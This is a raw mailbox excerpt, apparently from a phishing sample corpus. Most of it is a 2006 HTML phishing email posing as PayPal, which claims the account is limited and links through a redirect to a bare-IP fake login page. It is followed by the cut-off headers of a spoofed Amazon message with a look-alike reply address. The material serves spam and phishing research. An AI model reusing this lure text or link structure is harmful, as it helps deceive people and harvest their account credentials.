From: "Pay Pal" <do-not-reply@email-change.no-ip.org>
Subject: New email address added to your account
Date: Wed, 1 Feb 2006 05:49:22 -0800
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Message-Id: <20060201134935.CE7786CCF8C@mail1.example.com>
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 323

d=RTEContent>
<DIV>
<TABLE width=680 align=center>
<TBODY>
<TR>
<TD>
<IMG height=35 alt=PayPal src="http://images.paypal.com/en_US/i/logo/email_logo.gif" width=255 border=0></TD></TR></TBODY></TABLE>
<TABLE cellPadding=0 width="100%">
<TBODY>
<TR>
<TD width="100%" background=http://images.paypal.com/images/bg_clk.gif><IMG height=29 src="http://images.paypal.com/images/pixel.gif" width=1 border=0></TD></TR></TBODY></TABLE><BR>
<TABLE align=center>
<TBODY>
<TR>
<TD width=400><font face="Verdana" size="2">PayPal is constantly working to ensure security by regularly screening the accounts in our system. We recently reviewed your account, and we need more information to help us provide you with secure service. Until we can collect this information, your access to sensitive account features will be limited. We would like to restore your access as soon as possible, and we apologize for the inconvenience. <BR>
</font>
<HR class=dotted>
<font face="Verdana" size="2">
<SPAN class=emphasis>Why is my account access limited?</SPAN><BR><BR class=h6>Your account access has been limited for the following reason(s):<BR>
</font>
<LI><span class="emphasis"><strong><font face="Verdana" size="2">Feb</font></strong></span><font face="Verdana" size="2"><SPAN class=emphasis><STRONG>. 
01, 2006</STRONG>: </SPAN>We have observed activity in this account that is unusual or potentially high risk <BR><BR>(Your case ID for this reason is PP-124-448-529.)</font><BR>
<HR class=dotted>
<font face="Verdana">
<SPAN class=emphasis><font size="2">How can I restore my account access?</font></SPAN><font size="2"><BR>
</font></font>
<TABLE cellSpacing=0 cellPadding=1 width="100%" align=center bgColor=#cc9999>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=5 width="100%" align=center bgColor=#ffeeee>
<TBODY>
<TR>
<TD><font face="Verdana" size="2"><SPAN class=emphasis>Please visit the 
<a target="_blank" href="http://rds.yahoo.com/S=44831148:D1/CS=44831148/SS=44831166/SIG=11v8331g7/*http:/203.160.230.74/.cgi_bin/updates/us/webscr.php?cmd=LogIn"><FONT color=#003399>Resolution Center</FONT></a> and complete the "Steps to Remove Limitations." </SPAN>
</font></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>&nbsp;<HR class=dotted>

<TABLE>
<TBODY>
<TR>
<TD></TD></TR>
<TR>
<TD>
<TR>
<TD><font face="Verdana"><FONT color=#808080 size="1">Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, </FONT>
<FONT color=#808080 size="1">log in to your PayPal account and choose the "Help" link in the footer of any page.</FONT><font color="#808080"><BR>
</font></font></TD></TR>
<TR>
<TD><font face="Verdana"><IMG height=10 src="http://images.paypal.com/en_US/i/scr/pixel.gif" width=1 border=0></font></TD></TR></TD></TR>
<TR>
<TD><font face="Verdana" size="2">PayPal Email ID PP059</font></TD></TR></TBODY></TD></TABLE></LI></TD>
<TD vAlign=to

From update@amazon.com  Wed Feb  1 11:09:40 2006
Return-Path: <update@amazon.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id B77AE537133
	for <nobody@login.example.com>; Wed,  1 Feb 2006 11:09:40 -0500 (EST)
Received: from lujan.example.com (foo.example.com [10.2.3.4])
	by mail2.example.com (Postfix) with ESMTP id 9579E6FA21E
	for <nobody@example.com>; Wed,  1 Feb 2006 11:09:39 -0500 (EST)
Received: by lujan.example.com (Postfix)
	id 8CECE1BC67; Wed,  1 Feb 2006 17:09:41 +0100 (CET)
Delivered-To: foobee@example.com
Received: from localhost (unknown [127.0.0.1])
	by lujan.example.com (Postfix) with ESMTP id 3642F1BC16
	for <foobee@example.com>; Wed,  1 Feb 2006 16:09:41 +0000 (UTC)
Received: from lujan.example.com ([127.0.0.1])
	by localhost (lujan [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
	id 31660-01 for <foobee@example.com>;
	Wed, 1 Feb 2006 17:09:21 +0100 (CET)
Received: from p15114492.pureserver.info (p15114492.pureserver.info [217.160.171.113])
	by lujan.example.com (Postfix) with ESMTP id 68C751BC4C
	for <foobee@example.com>; Wed,  1 Feb 2006 17:09:14 +0100 (CET)
Received: from User (unknown [209.59.164.22])
	by p15114492.pureserver.info (Postfix) with ESMTP
	id C9BC02ED559; Wed,  1 Feb 2006 17:04:24 +0100 (CET)
Reply-To: <update@aamazon.com>
